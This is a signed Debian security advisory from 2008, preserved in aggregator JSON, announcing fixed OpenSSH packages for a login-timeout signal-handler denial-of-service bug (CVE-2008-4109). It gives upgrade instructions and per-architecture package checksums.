SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1638-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nSeptember 16, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : openssh\r\nVulnerability : remote\r\nProblem type : unsafe signal handler\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-4109\r\nDebian Bug : 498678\r\n\r\nIt has been discovered that the signal handler implementing the login\r\ntimeout in Debian's version of the OpenSSH server uses functions which\r\nare not async-signal-safe, leading to a denial of service\r\nvulnerability (CVE-2008-4109).\r\n\r\nThe problem was originally corrected in OpenSSH 4.4p1 (CVE-2006-5051),\r\nbut the patch backported to the version released with etch was\r\nincorrect.\r\n\r\nSystems affected by this issue suffer from lots of zombie sshd\r\nprocesses. Processes stuck with a "[net]" process title have also been\r\nobserved. Over time, a sufficient number of processes may accumulate\r\nsuch that further login attempts are impossible. Presence of these\r\nprocesses does not indicate active exploitation of this vulnerability.\r\nIt is possible to trigger this denial of service condition by accident.\r\n\r\nFor the stable distribution (etch), this problem has been fixed in\r\nversion 4.3p2-9etch3.\r\n\r\nFor the unstable distribution (sid) and the testing distribution\r\n(lenny), this problem has been fixed in version 4.6p1-1.\r\n\r\nWe recommend that you upgrade your openssh packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch3.diff.gz\r\n Size/MD5 checksum: 275859 d36cb34826bb92eca24a9397369baee6\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2.orig.tar.gz\r\n Size/MD5 checksum: 920186 239fc801443acaffd4c1f111948ee69c\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch3.dsc\r\n Size/MD5 checksum: 1310 1888a56e6050c8b8c2caf95e9da1db84\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-krb5_4.3p2-9etch3_all.deb\r\n Size/MD5 checksum: 91378 2748b67458de398e05e7c05227a0c612\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh_4.3p2-9etch3_all.deb\r\n Size/MD5 checksum: 1052 f47a80d017cd3184bc981a38ced31ee8\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_alpha.deb\r\n Size/MD5 checksum: 782932 e7f3b896603dc1aebadb370d79ab90f5\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_alpha.deb\r\n Size/MD5 checksum: 100580 8ed4b61e252f3080073134abae2a36cd\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_alpha.udeb\r\n Size/MD5 checksum: 213712 9eb6b65f9292db607a4b2d6bf498c54f\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_alpha.deb\r\n Size/MD5 checksum: 266512 81805fcb11c56d7252ecdf4a1e74d713\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_alpha.udeb\r\n Size/MD5 checksum: 198516 d294a1db5f4257c4c58154bb160232f1\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_amd64.deb\r\n Size/MD5 checksum: 710490 816deaa292a89d07a1d8b6ad196eb72d\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_amd64.deb\r\n Size/MD5 checksum: 99976 05a863e6cd0aaced1cf8c774d7573274\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_amd64.udeb\r\n Size/MD5 checksum: 183846 a9c89a870bb58463606ec8b736643144\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_amd64.deb\r\n Size/MD5 checksum: 244368 9d0b3126c34e338b4f5216284518aea8\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_amd64.udeb\r\n Size/MD5 checksum: 171380 2cf03617de7bd22ff03b85f8ca2b25f0\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_arm.deb\r\n Size/MD5 checksum: 650726 a50736277f77d29a8cd59be5de31efe8\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_arm.deb\r\n Size/MD5 checksum: 99754 bee5a81d4168699a324ff572d6e436d6\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_arm.udeb\r\n Size/MD5 checksum: 164866 067f69be0283f3bb3cf697f4312d2bbb\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_arm.deb\r\n Size/MD5 checksum: 218966 2a8dfbfc4e5abe2d333f20e123ad38ad\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_arm.udeb\r\n Size/MD5 checksum: 171672 a0ce63abaee1e7cfbaf64e62dc8164b5\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_hppa.deb\r\n Size/MD5 checksum: 732946 3177a89f68634880a3da10e054abe538\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_hppa.udeb\r\n Size/MD5 checksum: 189606 92ce0ac13874e3ec7ef20e7d97221850\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_hppa.deb\r\n Size/MD5 checksum: 249864 191165420d41b4ea84f7ae820a61dee1\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_hppa.udeb\r\n Size/MD5 checksum: 198138 af0b7c29c951135595170b63251dd484\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_hppa.deb\r\n Size/MD5 checksum: 100532 55db615aae32e2adf40dbe79b5fc7cf1\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_i386.deb\r\n Size/MD5 checksum: 99766 5844bc9b9aebd6da32ceba7b80017dea\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_i386.udeb\r\n Size/MD5 checksum: 162626 b8ce1b90a26b1097ddfc5fb8323dc1d3\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_i386.deb\r\n Size/MD5 checksum: 223696 087b8d33303c197953ba2a9904345592\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_i386.udeb\r\n Size/MD5 checksum: 154038 308a4f0d415532bfa7b3836d70aaf4ea\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_i386.deb\r\n Size/MD5 checksum: 659992 df6bf6ae7a34e91d5677115bbdb01b73\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_ia64.deb\r\n Size/MD5 checksum: 962182 49dc85d747e2a50d8e37b9c4e7428e6e\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_ia64.udeb\r\n Size/MD5 checksum: 269904 bf013bd6ab07afab765d6ca84be21666\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_ia64.deb\r\n Size/MD5 checksum: 338240 3fe40ae711c9c0c3689f5d8c50b70af7\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_ia64.deb\r\n Size/MD5 checksum: 101440 c49ecbbdd0101c8a90fcc9d4b60ae1c8\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_ia64.udeb\r\n Size/MD5 checksum: 251934 793c1d31b7a179a766ed57d6ad5649cf\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_mips.deb\r\n Size/MD5 checksum: 732114 9ec13c1de7481000339c6f10ebb7f149\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_mips.udeb\r\n Size/MD5 checksum: 191298 d190ada9fd3c0420d949126c02fa85da\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_mips.deb\r\n Size/MD5 checksum: 251044 c97d6f7d9baf2b1678289e9e067ea4d4\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_mips.udeb\r\n Size/MD5 checksum: 200554 028987ca5310b3fb2e6003ba385b2bd0\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_mips.deb\r\n Size/MD5 checksum: 99996 f52e7996ddb5f7bff8d6ced65f82bd2d\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_powerpc.udeb\r\n Size/MD5 checksum: 168340 030a27c9ce4287f28669ba4a5af8247c\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_powerpc.deb\r\n Size/MD5 checksum: 237020 3cde6fe4ab569ca83cc9616572be11ca\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_powerpc.udeb\r\n Size/MD5 checksum: 173280 38bdde6d16b07399ba996dd66a6311ae\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_powerpc.deb\r\n Size/MD5 checksum: 700832 6397ec69df1deb0c5e0bc4c58ffae141\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_powerpc.deb\r\n Size/MD5 checksum: 101248 bfcd1a41ede062d9449f5be7eb7cd16f\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_s390.deb\r\n Size/MD5 checksum: 246734 9181c374dcb69441bd7ec030aadfb911\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_s390.udeb\r\n Size/MD5 checksum: 188516 a3786ab0a693ddb4f81fdeeead01ec51\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_s390.deb\r\n Size/MD5 checksum: 100226 73ec19e480b2e9b4c2809a04a77d27b9\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_s390.deb\r\n Size/MD5 checksum: 725828 7ff9eafecb36d2147305e08289ca22a4\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_s390.udeb\r\n Size/MD5 checksum: 196900 23c3164ff897157de7fdd6b334a39e95\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_sparc.deb\r\n Size/MD5 checksum: 640266 7c833bcc2eb5a606be3bc4243313bc97\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_sparc.deb\r\n Size/MD5 checksum: 218194 eceb87ee9c789edfae071afe782c3a5f\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_sparc.udeb\r\n Size/MD5 checksum: 166716 869791f368a6de4cfc3ddd818be8c33f\r\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_sparc.deb\r\n Size/MD5 checksum: 99714 8564652d41a2c1709c6d3794b241ddc5\r\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_sparc.udeb\r\n Size/MD5 checksum: 158356 d2f2015c554f5f1cd918d07559f82ebd\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJI0Bl3AAoJEL97/wQC1SS+wIsIAJ91WnpBmk2Xkoyauc1ODZyL\r\nKHOQ+NKy9DgjZ9GsHhPWQIcPbc1HjIbtsMhp+xDyZsM+f9e/+1lrqmqsGE4Nnyhj\r\nYKFpnvD7d/wgUWvB/mc8znqL3iW0XNu71o5fgW2JQ8AE9R5erhcJqPijyV/Kakuw\r\nASlAtGIgJ7Z/8kExMiwM8eA9MAat6K4ISWDIHKXMegaUGsXQKU6THmZ5+ony3sBG\r\nM8ur+hH70PFsWr/aj5dkqLl9sMQOp9u/FmodK//W3OOEKh5SUkbw5PYQ8qqHHMI3\r\n4Nm9+R207pd3IM4kr7kiMdVzz7gE4doFxrgwkxVfKO2vbdwoZeY5HPMIBFgYjUM=\r\n=GId6\r\n-----END PGP SIGNATURE-----", "modified": "2008-09-20T00:00:00", "published": "2008-09-20T00:00:00", "id": "SECURITYVULNS:DOC:20554", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20554", "title": "[SECURITY] [DSA 1638-1] New openssh packages fix denial of service", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Multiple different DoS conditions.", "modified": "2008-10-03T00:00:00", "published": "2008-10-03T00:00:00", "id": "SECURITYVULNS:VULN:6657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6657", "title": "Multiple OpenSSH security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
